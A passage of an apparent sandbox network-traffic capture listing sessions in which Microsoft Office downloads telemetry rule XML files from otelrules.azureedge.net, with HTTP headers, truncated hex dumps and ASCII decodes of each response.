                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                        x-ms-request-id: 7b3b97af-701e-003e-795c-3d79b3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041214Z-178bfbc474bbbqrhhC1NYCvw7400000005g000000000h25h
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:14 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        132192.168.2.74990713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:14 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                        x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041214Z-178bfbc474bwh9gmhC1NYCy3rs00000005m0000000003ced
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        133192.168.2.74990113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:14 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:14 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                        x-ms-request-id: 734d7ed2-001e-002b-08e4-3c99f2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041214Z-178bfbc474bpscmfhC1NYCfc2c00000003z000000000ffmv
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:14 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        134192.168.2.74992313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:16 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:16 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                        x-ms-request-id: bfe6e8fa-201e-006e-3f8c-3abbe3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041216Z-174c587ffdfp4vpjhC1TEBybqw00000003vg00000000gawm
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        135192.168.2.74992413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:16 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:16 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                        x-ms-request-id: 3b38473f-101e-007a-2bbc-3b047e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041216Z-15b8b599d889gj5whC1TEBfyk000000003rg000000009x0f
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        136192.168.2.74992513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:16 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:16 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                        x-ms-request-id: fdb50a35-301e-005d-1e2f-3ce448000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041216Z-178bfbc474bbcwv4hC1NYCypys00000005c0000000002hft
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        137192.168.2.74993113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:16 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:16 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                        x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041216Z-178bfbc474bp8mkvhC1NYCzqnn000000057g00000000cemn
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        138192.168.2.74993213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:16 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:16 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                        x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041216Z-174c587ffdfcb7qhhC1TEB3x70000000042g0000000021q7
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:16 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        139192.168.2.74993913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:18 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:18 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                        x-ms-request-id: 9403c66c-f01e-0052-600e-3d9224000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041218Z-178bfbc474btrnf9hC1NYCb80g00000005h000000000f57u
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:19 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        140192.168.2.74994013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:18 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:18 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                        x-ms-request-id: 5431248a-601e-005c-155d-3df06f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041218Z-174c587ffdfmrvb9hC1TEBtn3800000003tg00000000sp3b
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:19 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
